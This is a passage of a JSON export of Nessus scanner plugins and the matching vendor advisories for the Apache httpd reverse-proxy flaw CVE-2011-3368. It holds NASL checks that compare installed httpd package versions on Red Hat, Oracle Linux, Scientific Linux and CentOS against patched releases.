\n # Again, we won't get a status code via HTTP 0.9 so the best we can do is check for the default\n # 503 page (resulting from trying to connect to a closed port)\n if ('<title>503 Service Temporarily Unavailable</title>' >< res[2])\n {\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n chomp(res[2]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(0, 'The web server listening on port '+port+' is likely not affected.');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T04:37:27", "description": "From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. 
(CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-suexec", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/68377", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# Oracle Linux Security Advisory ELSA-2011-1392 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68377);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:09\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002421.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002422.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"httpd-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-devel-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-manual-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-suexec-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"mod_ssl-2.0.52-49.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-53.0.2.el5_7.3\")) flag++;\nif 
(rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-53.0.2.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T05:34:59", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 23, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2021-01-02T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111020_HTTPD_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61160", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61160);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:20\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. 
This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1110&L=scientific-linux-errata&T=0&P=2404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8660505\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"httpd-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-debuginfo-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-devel-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-manual-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-suexec-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"mod_ssl-2.0.52-49.sl4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-53.sl5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 
\"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:27:18", "description": "Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 26, "published": "2011-10-21T00:00:00", "title": "CentOS 4 / 5 : httpd (CESA-2011:1392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2011-10-21T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd-suexec", "p-cpe:/a:centos:centos:mod_ssl", "p-cpe:/a:centos:centos:httpd-manual", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# CentOS Errata and Security Advisory 2011:1392 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56570);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"CentOS 4 / 5 : httpd (CESA-2011:1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55083c8a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0cbcfc97\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1569ea8b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f65d4a6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-devel-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-manual-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mod_ssl-2.2.3-53.el5.centos.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T04:59:53", "description": "Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 27, "published": "2011-10-21T00:00:00", "title": "RHEL 4 / 5 : httpd (RHSA-2011:1392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:httpd-suexec", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56579", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56579);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2019/10/25 13:36:16\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"RHEL 4 / 5 : httpd (RHSA-2011:1392)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
